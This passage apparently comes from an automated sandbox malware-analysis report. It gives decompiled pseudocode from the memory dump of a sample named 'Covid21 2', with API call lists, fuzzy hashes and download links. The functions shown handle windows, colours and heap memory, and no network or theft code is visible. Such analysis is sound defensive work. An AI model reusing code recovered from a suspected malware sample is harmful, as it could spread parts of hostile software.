				signed int _t151;
				signed int _t155;
				struct HWND__* _t156;
				signed int* _t157;
				void* _t172;

				_t148 = 0;
				_t95 = E0040642D( *0x40b478);
				_t156 = _a16;
				_t157 = _t95;
				_t96 = E0040523F(_a4, _a8, _a12, _t156);
				if(_t96 != 0xd0d0d0d1) {
					L105:
					return _t96;
				}
				_t97 = _a4;
				_v12 = _t97;
				if(_t97 == 0) {
					L6:
					_t15 =  &_v8;
					 *_t15 = _v8 | 0xffffffff;
					__eflags =  *_t15;
					L7:
					_t155 = 0;
					if(_t148 == 0) {
						L21:
						_t98 = _t157[0x14];
						__eflags = _t98 - _t155;
						if(_t98 == _t155) {
							L11:
							_t99 = _a8;
							_t151 = _v8;
							_a16 = 0xd0d0d0d1;
							_t157[1] = _t151;
							if(_t99 > 0x115) {
								__eflags = _t99 - 0x332f;
								if(__eflags > 0) {
									_t100 = _t99 - 0x3331;
									__eflags = _t100;
									if(_t100 == 0) {
										_t157[3] = 0x3331;
										L102:
										_t157[0x15] = _t156;
										L103:
										_a16 = _t155;
										L104:
										return _a16;
									}
									_t102 = _t100 - 1;
									__eflags = _t102;
									if(_t102 == 0) {
										_t157[3] = 0x3332;
										 *_t157 = _a12;
										goto L102;
									}
									__eflags = _t102 != 0xe;
									if(_t102 != 0xe) {
										goto L104;
									}
									L98:
									_push(_t156);
									_push(_a12);
									_push(_a8);
									_push(_a4);
									_push(_t156);
									L99:
									_a16 = L00405625();
									goto L104;
								}
								if(__eflags == 0) {
									_t157[3] = 0x332c;
									 *_t157 = _a12;
									_t157[2] = _t156;
									goto L103;
								}
								__eflags = _t99 - 0x133;
								if(_t99 < 0x133) {
									goto L104;
								}
								__eflags = _t99 - 0x135;
								if(_t99 <= 0x135) {
									goto L98;
								}
								__eflags = _t99 - 0x138;
								if(_t99 == 0x138) {
									goto L98;
								}
								__eflags = _t99 - 0x30d5;
								if(_t99 == 0x30d5) {
									PostMessageA(_a4, 0x30d6, _a12, _t156);
									L63:
									_a16 = _a16 & 0x00000000;
									goto L104;
								}
								__eflags = _t99 - 0x30d6;
								if(_t99 != 0x30d6) {
									goto L104;
								}
								__eflags = _t156 - 0x203;
								_t157[3] = 0x332e;
								 *_t157 = _a12;
								if(_t156 != 0x203) {
									__eflags = _t156 - 0x206;
									if(_t156 != 0x206) {
										__eflags = _t156 - 0x201;
										if(_t156 != 0x201) {
											__eflags = _t156 - 0x204;
											if(_t156 != 0x204) {
												_t157[3] = _t155;
											} else {
												_t157[2] = 1;
											}
										} else {
											_t157[2] = _t155;
										}
									} else {
										_t157[2] = 3;
									}
								} else {
									_t157[2] = 2;
								}
								goto L103;
							}
							if(_t99 >= 0x114) {
								goto L98;
							}
							_t172 = _t99 - 0x14;
							if(_t172 > 0) {
								__eflags = _t99 - 0x15;
								if(_t99 == 0x15) {
									__eflags = _t148 - _t155;
									if(_t148 != _t155) {
										__eflags =  *((intOrPtr*)(_t148 + 0x1c)) - _t155;
										if( *((intOrPtr*)(_t148 + 0x1c)) == _t155) {
											 *0x40a85c(_a4, E004056D9, 0);
										}
									}
									goto L104;
								}
								__eflags = _t99 - 0x24;
								if(_t99 == 0x24) {
									__eflags = _t148 - _t155;
									if(_t148 == _t155) {
										goto L104;
									}
									_t110 =  *(_t148 + 0x24) & 0x0000ffff;
									__eflags = _t110 - _t155;
									if(_t110 != _t155) {
										 *(_t156 + 0x18) = _t110 & 0x0000ffff;
									}
									_t111 =  *(_t148 + 0x26) & 0x0000ffff;
									__eflags = _t111 - _t155;
									if(_t111 != _t155) {
										 *(_t156 + 0x1c) = _t111 & 0x0000ffff;
									}
									_t112 =  *(_t148 + 0x28) & 0x0000ffff;
									__eflags = _t112 - _t155;
									if(_t112 != _t155) {
										 *(_t156 + 0x20) = _t112 & 0x0000ffff;
									}
									_t113 =  *(_t148 + 0x2a) & 0x0000ffff;
									__eflags = _t113 - _t155;
									if(_t113 != _t155) {
										 *(_t156 + 0x24) = _t113 & 0x0000ffff;
									}
									goto L103;
								}
								__eflags = _t99 - 0x4e;
								if(_t99 == 0x4e) {
									_push(_t156);
									_push(_a12);
									_push(0x4e);
									_push(_a4);
									_push(_t156->i);
									goto L99;
								}
								__eflags = _t99 - 0x111;
								if(_t99 != 0x111) {
									goto L104;
								}
								_t149 = _a12;
								_t118 = L00405625(_t156, _a4, 0x111, _t149, _t156);
								__eflags = _t118 - 0xd0d0d0d1;
								if(_t118 != 0xd0d0d0d1) {
									goto L63;
								}
								_t120 = _t149 >> 0x10;
								__eflags = _t156;
								if(_t156 == 0) {
									__eflags = _t120;
									if(_t120 == 0) {
										L54:
										 *_t157 = _t149;
										L62:
										_t157[3] = 0x332d;
										goto L63;
									}
									__eflags = _t149 - 0xfa01;
									if(_t149 != 0xfa01) {
										__eflags = _t149 - 0xfa02;
										if(_t149 != 0xfa02) {
											 *_t157 = _t149 & 0x0000ffff;
											goto L62;
										}
										_push(1);
										L58:
										E00405C70();
										goto L63;
									}
									_push(0);
									goto L58;
								}
								_t157[3] = 0x332c;
								_t157[2] = _t120;
								_t123 = GetWindowLongA(_t156, 0xfffffff4);
								__eflags = _t123 - 0xffffd8f0;
								 *_t157 = _t123;
								if(_t123 != 0xffffd8f0) {
									goto L63;
								}
								_t149 = _t149 & 0x0000ffff;
								__eflags = _t149;
								goto L54;
							}
							if(_t172 == 0) {
								__eflags = _t148 - _t155;
								if(_t148 != _t155) {
									__eflags =  *(_t148 + 0x18);
									if( *(_t148 + 0x18) == 0) {
										_t125 = _a4;
										__eflags =  *_t148 - _t125;
										if( *_t148 == _t125) {
											_t150 =  *(_t148 + 0x20);
											__eflags = _t150;
											if(_t150 != 0) {
												_a16 = _t150->i(_a12, _t125);
											}
										}
									} else {
										GetClientRect(_a4,  &_v28);
										FillRect(_a12,  &_v28,  *(_t148 + 0x18));
										_a16 = 1;
									}
								}
								E00405685(_t157, 0xf, _v8);
								goto L104;
							}
							_t131 = _t99 - 3;
							if(_t131 == 0) {
								L19:
								if(_t151 != 0xffffffff) {
									E00405685(_t157, _a8, _v8);
									_t155 = 0;
								}
								goto L103;
							}
							_t134 = _t131;
							if(_t134 == 0) {
								__eflags = _v12 - _a4;
								if(_v12 != _a4) {
									L25:
									_a16 = 1;
									goto L104;
								}
								__eflags = _t151 - 0xffffffff;
								if(_t151 == 0xffffffff) {
									goto L104;
								}
								_t137 = _a12 - _t155;
								__eflags = _t137;
								if(_t137 == 0) {
									__eflags =  *(_t148 + 0x2c) - _t155;
									if( *(_t148 + 0x2c) == _t155) {
										L36:
										_push(_v8);
										L37:
										_push(5);
										L38:
										_push(_t157);
										E00405685();
										goto L63;
									} else {
										_push(_v8);
										_t39 = _t148 + 0x2c;
										 *_t39 =  *(_t148 + 0x2c) & 0x00000000;
										__eflags =  *_t39;
										_push(0x3335);
										L35:
										_push(_t157);
										E00405685();
										goto L36;
									}
								}
								_t140 = _t137 - 1;
								__eflags = _t140;
								_push(_v8);
								if(_t140 == 0) {
									 *(_t148 + 0x2c) = 1;
									_push(0x3333);
									goto L38;
								}
								__eflags = _t140 != 1;
								if(_t140 != 1) {
									goto L37;
								} else {
									 *(_t148 + 0x2c) = 1;
									_push(0x3334);
									goto L35;
								}
							}
							_t142 = _t134 - 1;
							if(_t142 == 0) {
								__eflags = _a12 - _t155;
								if(_a12 != _t155) {
									E00405685(_t157, 0x3330, _v8);
								}
								goto L25;
							}
							if(_t142 != 0xa) {
								goto L104;
							}
							goto L19;
						} else {
							L9:
							_t96 =  *_t98(_a4, _a8, _a12, _t156);
							if(_t96 != 0xe0e0e0e1) {
								goto L105;
							} else {
								_t155 = 0;
								goto L11;
							}
						}
					}
					_t98 =  *(_t148 + 0xc);
					if(_t98 == 0) {
						goto L21;
					}
					goto L9;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t145 = GetPropA(_v12, "PB_WindowID");
					_v8 = _t145;
					if(_t145 != 0) {
						break;
					}
					_t147 = GetParent(_v12);
					_v12 = _t147;
					if(_t147 != 0) {
						continue;
					}
					break;
				}
				if(_v12 == _t148) {
					goto L6;
				} else {
					_v8 = _v8 - 1;
					_t148 = E00406690( *0x40b474, _v8);
					goto L7;
				}
			}




































                                  0x004056fe
                                  0x00405700
                                  0x00405705
                                  0x0040570c
                                  0x00405714
                                  0x0040571e
                                  0x00405b1c
                                  0x00405b1c
                                  0x00405b1c
                                  0x00405724
                                  0x00405729
                                  0x0040572c
                                  0x0040576d
                                  0x0040576d
                                  0x0040576d
                                  0x0040576d
                                  0x00405771
                                  0x00405771
                                  0x00405775
                                  0x00405801
                                  0x00405801
                                  0x00405804
                                  0x00405806
                                  0x0040579b
                                  0x0040579b
                                  0x004057a3
                                  0x004057a6
                                  0x004057ad
                                  0x004057b0
                                  0x00405a15
                                  0x00405a17
                                  0x00405ada
                                  0x00405ada
                                  0x00405adc
                                  0x00405b0c
                                  0x00405b0f
                                  0x00405b0f
                                  0x00405b12
                                  0x00405b12
                                  0x00405b15
                                  0x00000000
                                  0x00405b15
                                  0x00405ade
                                  0x00405ade
                                  0x00405adf
                                  0x00405b01
                                  0x00405b08
                                  0x00000000
                                  0x00405b08
                                  0x00405ae1
                                  0x00405ae4
                                  0x00000000
                                  0x00000000
                                  0x00405ae6
                                  0x00405ae6
                                  0x00405ae7
                                  0x00405aea
                                  0x00405aed
                                  0x00405af0
                                  0x00405af1
                                  0x00405af9
                                  0x00000000
                                  0x00405af9
                                  0x00405a1d
                                  0x00405ac7
                                  0x00405ace
                                  0x00405ad0
                                  0x00000000
                                  0x00405ad0
                                  0x00405a23
                                  0x00405a28
                                  0x00000000
                                  0x00000000
                                  0x00405a2e
                                  0x00405a33
                                  0x00000000
                                  0x00000000
                                  0x00405a39
                                  0x00405a3e
                                  0x00000000
                                  0x00000000
                                  0x00405a44
                                  0x00405a49
                                  0x00405ab9
                                  0x00405984
                                  0x00405984
                                  0x00000000
                                  0x00405984
                                  0x00405a4b
                                  0x00405a50
                                  0x00000000
                                  0x00000000
                                  0x00405a56
                                  0x00405a5f
                                  0x00405a66
                                  0x00405a68
                                  0x00405a76
                                  0x00405a7c
                                  0x00405a8a
                                  0x00405a90
                                  0x00405a97
                                  0x00405a9d
                                  0x00405aa8
                                  0x00405a9f
                                  0x00405a9f
                                  0x00405a9f
                                  0x00405a92
                                  0x00405a92
                                  0x00405a92
                                  0x00405a7e
                                  0x00405a7e
                                  0x00405a7e
                                  0x00405a6a
                                  0x00405a6a
                                  0x00405a6a
                                  0x00000000
                                  0x00405a68
                                  0x004057bb
                                  0x00000000
                                  0x00000000
                                  0x004057c1
                                  0x004057c4
                                  0x004058e8
                                  0x004058eb
                                  0x004059ea
                                  0x004059ec
                                  0x004059f2
                                  0x004059f5
                                  0x00405a05
                                  0x00405a05
                                  0x004059f5
                                  0x00000000
                                  0x004059ec
                                  0x004058f1
                                  0x004058f4
                                  0x0040599d
                                  0x0040599f
                                  0x00000000
                                  0x00000000
                                  0x004059a5
                                  0x004059a9
                                  0x004059ac
                                  0x004059b1
                                  0x004059b1
                                  0x004059b4
                                  0x004059b8
                                  0x004059bb
                                  0x004059c0
                                  0x004059c0
                                  0x004059c3
                                  0x004059c7
                                  0x004059ca
                                  0x004059cf
                                  0x004059cf
                                  0x004059d2
                                  0x004059d6
                                  0x004059d9
                                  0x004059e2
                                  0x004059e2
                                  0x00000000
                                  0x004059d9
                                  0x004058fa
                                  0x004058fd
                                  0x0040598d
                                  0x0040598e
                                  0x00405991
                                  0x00405993
                                  0x00405996
                                  0x00000000
                                  0x00405996
                                  0x00405908
                                  0x0040590a
                                  0x00000000
                                  0x00000000
                                  0x00405910
                                  0x0040591a
                                  0x00405922
                                  0x00405927
                                  0x00000000
                                  0x00000000
                                  0x0040592b
                                  0x0040592e
                                  0x00405930
                                  0x00405958
                                  0x0040595b
                                  0x00405954
                                  0x00405954
                                  0x0040597d
                                  0x0040597d
                                  0x00000000
                                  0x0040597d
                                  0x0040595d
                                  0x00405962
                                  0x0040596d
                                  0x00405972
                                  0x0040597b
                                  0x00000000
                                  0x0040597b
                                  0x00405974
                                  0x00405966
                                  0x00405966
                                  0x00000000
                                  0x00405966
                                  0x00405964
                                  0x00000000
                                  0x00405964
                                  0x00405935
                                  0x0040593c
                                  0x0040593f
                                  0x00405945
                                  0x0040594a
                                  0x0040594c
                                  0x00000000
                                  0x00000000
                                  0x0040594e
                                  0x0040594e
                                  0x00000000
                                  0x0040594e
                                  0x004057ca
                                  0x00405891
                                  0x00405893
                                  0x00405895
                                  0x00405899
                                  0x004058c1
                                  0x004058c4
                                  0x004058c6
                                  0x004058c8
                                  0x004058cb
                                  0x004058cd
                                  0x004058d5
                                  0x004058d5
                                  0x004058cd
                                  0x0040589b
                                  0x004058a2
                                  0x004058b2
                                  0x004058b8
                                  0x004058b8
                                  0x00405899
                                  0x004058de
                                  0x00000000
                                  0x004058de
                                  0x004057d0
                                  0x004057d3
                                  0x004057e5
                                  0x004057e8
                                  0x004057f5
                                  0x004057fa
                                  0x004057fa
                                  0x00000000
                                  0x004057e8
                                  0x004057d6
                                  0x004057d7
                                  0x00405830
                                  0x00405833
                                  0x00405821
                                  0x00405821
                                  0x00000000
                                  0x00405821
                                  0x00405835
                                  0x00405838
                                  0x00000000
                                  0x00000000
                                  0x00405841
                                  0x00405841
                                  0x00405843
                                  0x0040586a
                                  0x0040586d
                                  0x00405881
                                  0x00405881
                                  0x00405884
                                  0x00405884
                                  0x00405886
                                  0x00405886
                                  0x00405887
                                  0x00000000
                                  0x0040586f
                                  0x0040586f
                                  0x00405872
                                  0x00405872
                                  0x00405872
                                  0x00405876
                                  0x0040587b
                                  0x0040587b
                                  0x0040587c
                                  0x00000000
                                  0x0040587c
                                  0x0040586d
                                  0x00405845
                                  0x00405845
                                  0x00405846
                                  0x00405849
                                  0x0040585c
                                  0x00405863
                                  0x00000000
                                  0x00405863
                                  0x0040584b
                                  0x0040584c
                                  0x00000000
                                  0x0040584e
                                  0x0040584e
                                  0x00405855
                                  0x00000000
                                  0x00405855
                                  0x0040584c
                                  0x004057d9
                                  0x004057da
                                  0x0040580d
                                  0x00405811
                                  0x0040581c
                                  0x0040581c
                                  0x00000000
                                  0x00405811
                                  0x004057df
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405808
                                  0x00405782
                                  0x0040578c
                                  0x00405793
                                  0x00000000
                                  0x00405799
                                  0x00405799
                                  0x00000000
                                  0x00405799
                                  0x00405793
                                  0x00405806
                                  0x0040577b
                                  0x00405780
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040572e
                                  0x0040572e
                                  0x00405736
                                  0x0040573e
                                  0x00405741
                                  0x00000000
                                  0x00000000
                                  0x00405746
                                  0x0040574e
                                  0x00405751
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405751
                                  0x00405756
                                  0x00000000
                                  0x00405758
                                  0x00405758
                                  0x00405769
                                  0x00000000
                                  0x00405769

                                  APIs
                                    • Part of subcall function 0040523F: SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 00405290
                                    • Part of subcall function 0040523F: GetWindowRect.USER32(?,00000010), ref: 004052B8
                                    • Part of subcall function 0040523F: GetWindowRect.USER32(?,00000020), ref: 004052C1
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003D), ref: 004052D1
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003E), ref: 004052D8
                                    • Part of subcall function 0040523F: GetWindowLongA.USER32(?,000000F0), ref: 004052E2
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000005), ref: 004052F1
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000002E), ref: 00405311
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000022), ref: 00405320
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000023), ref: 00405327
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003B), ref: 0040532E
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003C), ref: 00405335
                                    • Part of subcall function 0040523F: SendMessageA.USER32(?,00000024,00000000,00000034), ref: 0040534A
                                    • Part of subcall function 0040523F: GetKeyState.USER32(00000001), ref: 0040534E
                                    • Part of subcall function 0040523F: SendMessageA.USER32(?,00000201,00000001,00000000), ref: 00405364
                                    • Part of subcall function 0040523F: SetCapture.USER32(?), ref: 00405369
                                    • Part of subcall function 0040523F: PostMessageA.USER32(?,00000231,00000000,00000000), ref: 00405379
                                  • GetPropA.USER32(?,PB_WindowID), ref: 00405736
                                  • GetParent.USER32(?), ref: 00405746
                                  • GetClientRect.USER32(?,00000000), ref: 004058A2
                                  • FillRect.USER32(?,00000000,?), ref: 004058B2
                                  • GetWindowLongA.USER32(?,000000F4), ref: 0040593F
                                  • PostMessageA.USER32(?,000030D6,?,?), ref: 00405AB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: System$Metrics$MessageRectWindow$LongPostSend$CaptureClientFillInfoParametersParentPropState
                                  • String ID: PB_WindowID
                                  • API String ID: 2736716905-1508741625
                                  • Opcode ID: 93faa1de843ff13983a97f0fb80ea3da8452202db0794824d6d1b7a3769e1e84
                                  • Instruction ID: 1772321966a510f6b624cdf624929c11ab729ec9b834574b68c11bb728a73535
                                  • Opcode Fuzzy Hash: 93faa1de843ff13983a97f0fb80ea3da8452202db0794824d6d1b7a3769e1e84
                                  • Instruction Fuzzy Hash: 26B1AE71600A06EBDF20AF55C884ABB7BB1EB54314F60843BE845B62D0D33D9A91EF1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040384E, Relevance: 10.5, APIs: 7, Instructions: 41threadwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E0040384E(struct HWND__* _a4) {
				long _t3;
				struct HWND__* _t16;
				intOrPtr* _t18;

				_t16 = _a4;
				_t3 = GetWindowThreadProcessId(_t16, 0);
				if(_t3 == GetCurrentThreadId() && IsWindowVisible(_t16) != 0 && IsWindowEnabled(_t16) != 0 && _t16 != GetForegroundWindow()) {
					EnableWindow(_t16, 0);
					_push(0x10);
					_t18 = E004067DA(0x40b208);
					 *(_t18 + 4) = _t16;
					 *_t18 = GetCurrentThreadId();
				}
				return 1;
			}






                                  0x00403851
                                  0x00403858
                                  0x0040386a
                                  0x0040388f
                                  0x00403895
                                  0x004038a2
                                  0x004038a5
                                  0x004038aa
                                  0x004038aa
                                  0x004038b2

                                  APIs
                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00403858
                                  • GetCurrentThreadId.KERNEL32 ref: 00403866
                                  • IsWindowVisible.USER32(?), ref: 0040386D
                                  • IsWindowEnabled.USER32(?), ref: 00403878
                                  • GetForegroundWindow.USER32 ref: 00403882
                                  • EnableWindow.USER32(?,00000000), ref: 0040388F
                                    • Part of subcall function 004067DA: RtlAllocateHeap.NTDLL(00000008,00000000,00406649), ref: 004067E6
                                  • GetCurrentThreadId.KERNEL32 ref: 004038A8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapProcessVisible
                                  • String ID:
                                  • API String ID: 2983394722-0
                                  • Opcode ID: 1d3563f3127e023f913d1c48bb15226510de4f21d660f64e0808139afde0f23e
                                  • Instruction ID: 3bd772517b7cdc64e9e8b09daf0a4afa7eecbfefda2ab3240d0ef6d89adb4e94
                                  • Opcode Fuzzy Hash: 1d3563f3127e023f913d1c48bb15226510de4f21d660f64e0808139afde0f23e
                                  • Instruction Fuzzy Hash: D9F04F321043005BE321AF75AD88B2B7BF8EB45751B14843AF545F3291DB38D811962E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004042F1, Relevance: 9.0, APIs: 6, Instructions: 40COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E004042F1(struct HWND__** __esi, intOrPtr _a16, struct HDC__* _a20) {
				long _t9;
				long _t10;
				struct HDC__* _t17;
				struct HWND__** _t22;
				struct HWND__* _t24;

				_t22 = __esi;
				_push(ss);
				if(_a16 == 0x138 && IsWindowEnabled( *__esi) != 0) {
					_t9 = __esi[5];
					_t17 = _a20;
					if(_t9 != 0xffffffff) {
						SetTextColor(_t17, _t9);
						if(__esi[4] == 0xffffffff) {
							SetBkColor(_t17, GetSysColor(0x14));
							_t24 = GetSysColorBrush(0x14);
						}
					}
					_t10 = _t22[4];
					if(_t10 != 0xffffffff) {
						SetBkColor(_t17, _t10);
						_t24 = _t22[6];
					}
				}
				return _t24;
			}








                                  0x004042f1
                                  0x004042f1
                                  0x004042fa
                                  0x00404308
                                  0x0040430f
                                  0x0040431a
                                  0x0040431e
                                  0x00404328
                                  0x00404334
                                  0x0040433e
                                  0x0040433e
                                  0x00404328
                                  0x00404340
                                  0x00404346
                                  0x0040434a
                                  0x0040434c
                                  0x0040434c
                                  0x00404350
                                  0x00404355

                                  APIs
                                  • IsWindowEnabled.USER32 ref: 004042FE
                                  • SetTextColor.GDI32(?,00000138), ref: 0040431E
                                  • GetSysColor.USER32(00000014), ref: 0040432C
                                  • SetBkColor.GDI32(?,00000000), ref: 00404334
                                  • GetSysColorBrush.USER32(00000014), ref: 00404338
                                  • SetBkColor.GDI32(?,?), ref: 0040434A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Color$BrushEnabledTextWindow
                                  • String ID:
                                  • API String ID: 3110319690-0
                                  • Opcode ID: f694d0c257acf5403a6b010375976c4580f9c7e074fbf9002324fa678aa0eddd
                                  • Instruction ID: c830c63a156bfd98ae0213a8c6392a2a45bc1c2ca30302da665ab6d8e089a352
                                  • Opcode Fuzzy Hash: f694d0c257acf5403a6b010375976c4580f9c7e074fbf9002324fa678aa0eddd
                                  • Instruction Fuzzy Hash: EDF036712003049FD6206F75AD44D6773F8EB94321B145B35F661E36E1C774EC158A35
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407650, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62memorystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00407650(void* __ecx, void** _a4, char* _a8) {
				int _v8;
				void* _t21;
				void* _t29;
				void* _t42;

				_v8 = 0;
				if(_a8 == 0) {
					if( *_a4 != 0) {
						_t21 =  *0x40b3fc; // 0x29a0000
						HeapFree(_t21, 1,  *_a4);
						 *_a4 = 0;
					}
				} else {
					_v8 = strlen(_a8);
					if( *_a4 != 0) {
						_t42 =  *0x40b3fc; // 0x29a0000
						 *_a4 = RtlReAllocateHeap(_t42, 1,  *_a4, _v8 + 5);
					} else {
						_t29 =  *0x40b3fc; // 0x29a0000
						 *_a4 = RtlAllocateHeap(_t29, 1, _v8 + 5);
					}
					E00407810(_a4,  *_a4, _a8, _v8);
				}
				return _v8 + 1;
			}







                                  0x00407654
                                  0x0040765f
                                  0x004076d0
                                  0x004076da
                                  0x004076e0
                                  0x004076e9
                                  0x004076e9
                                  0x00407661
                                  0x0040766d
                                  0x00407676
                                  0x004076a3
                                  0x004076b3
                                  0x00407678
                                  0x00407681
                                  0x00407690
                                  0x00407690
                                  0x004076c3
                                  0x004076c3
                                  0x004076f8

                                  APIs
                                  • strlen.MSVCRT ref: 00407665
                                  • RtlAllocateHeap.NTDLL(029A0000,00000001,-00000005), ref: 00407687
                                  • RtlReAllocateHeap.NTDLL(029A0000,00000001,?,-00000005), ref: 004076AA
                                  • HeapFree.KERNEL32(029A0000,00000001,Continue?,?,?,0040310F), ref: 004076E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Heap$Allocate$Freestrlen
                                  • String ID: Continue?
                                  • API String ID: 3543670626-4041895036
                                  • Opcode ID: e18bcd1afd36fd495d460676a976782b0225e8f390700b3e19994c5fad29eb23
                                  • Instruction ID: cae9a5905be6ddab59d871ac1b064cb42395ff2a8ffa857ff663baf975441a1f
                                  • Opcode Fuzzy Hash: e18bcd1afd36fd495d460676a976782b0225e8f390700b3e19994c5fad29eb23
                                  • Instruction Fuzzy Hash: 8D212E75A04208EFCB00DF58C984FAA37B5EF88314F20C469F8059B390D776AE51DB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004047BB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004047BB(void* __ecx, void* _a4, struct HWND__* _a8, struct HWND__* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _t16;
				struct HWND__* _t22;
				struct HWND__* _t24;
				intOrPtr _t29;
				struct HWND__* _t32;

				_t16 = E0040642D( *0x40b470);
				_t32 = _a8;
				_v8 = _t16;
				if(_a4 == 0xffffffff) {
					_a4 = _t32;
				}
				_t24 = _a12;
				_t32->i = _t24;
				 *((intOrPtr*)(_t32 + 4)) = _a16;
				 *((intOrPtr*)(_t32 + 0xc)) = SetWindowLongA(_t24, 0xfffffffc, E00404714);
				SetWindowLongA(_t24, 0xfffffff4, _a4);
				SetPropA(_t24, "PB_ID", _a4);
				_t29 = _v8;
				SendMessageA(_t24, 0x30,  *(_t29 + 8), 1);
				 *(_t29 + 4) =  *(_t29 + 4) & 0x00000000;
				_t22 = _t32;
				if(_a4 != _t32) {
					_t22 = _t24;
				}
				return _t22;
			}









                                  0x004047c8
                                  0x004047d1
                                  0x004047d4
                                  0x004047d7
                                  0x004047d9
                                  0x004047d9
                                  0x004047dc
                                  0x004047f0
                                  0x004047f2
                                  0x004047fa
                                  0x00404800
                                  0x0040480b
                                  0x00404811
                                  0x0040481c
                                  0x00404822
                                  0x00404829
                                  0x0040482b
                                  0x0040482d
                                  0x0040482d
                                  0x00404833

                                  APIs
                                  • SetWindowLongA.USER32(?,000000FC,00404714), ref: 004047F5
                                  • SetWindowLongA.USER32(?,000000F4,000000FF), ref: 00404800
                                  • SetPropA.USER32(?,PB_ID,000000FF), ref: 0040480B
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040481C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
